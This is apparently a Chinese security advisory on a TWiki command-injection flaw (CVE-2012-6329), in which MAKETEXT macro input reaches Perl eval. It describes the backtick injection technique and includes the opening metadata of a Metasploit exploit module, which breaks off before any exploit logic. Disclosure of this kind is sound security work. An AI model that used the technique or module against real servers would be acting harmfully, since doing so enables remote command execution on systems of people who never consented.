TWiki twiki/lib/TWiki.pm MAKETEXT宏任意shell命令注入漏洞

发布日期：2012-12-14
更新日期：2012-12-24

受影响系统：
TWiki TWiki <= 5.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56950
 CVE(CAN) ID: CVE-2012-6329,CVE-2012-6330
 
TWiki是一款灵活易用、功能强大的企业协作平台和知识管理系统。
 
TWiki Locale::Maketext CPAN模块内存在安全漏洞，MAKETEXT宏内的值没有被正确过滤直接传入Perl脚本中的eval函数中执行，可允许远程攻击者通过Perl脚本backtick ('')操作符执行任意shell命令。
 
<*来源：George Clark
 
  链接：
       
       
       
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
 # 
 ##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
        super(update_info(info,
            'Name'          => 'TWiki MAKETEXT Remote Command Execution',
            'Description'    => %q{
                    This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a
                specially crafted MAKETEXT, a malicious user can execute shell commands since user
                input is passed to the Perl "eval" command without first being sanitized. The
                problem is caused by an underlying security issue in the CPAN:Locale::Maketext
                module. This works in TWiki sites that have user interface localization enabled
                (UserInterfaceInternationalisation variable set).

If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,
                if the 'TwikiPage' option isn't provided, the module will try to create a random
                page on the SandBox space.  The modules has been tested successfully on
                TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.
            },
            'Author'        =>
                [
                    'George Clark', # original discovery
                    'juan vazquez' # Metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'    =>
                [
                    [ 'CVE', '2012-6329' ],
                    [ 'OSVDB', '88460' ],
                    [ 'BID', '56950' ],
                    [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]
                ],
            'Privileged'    => false, # web server context
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Space'      => 1024,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic ruby python bash telnet'
                        }
                },
            'Platform'      => [ 'unix' ],
            'Arch'          => ARCH_CMD,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Dec 15 2012',
            'DefaultTarget'  => 0))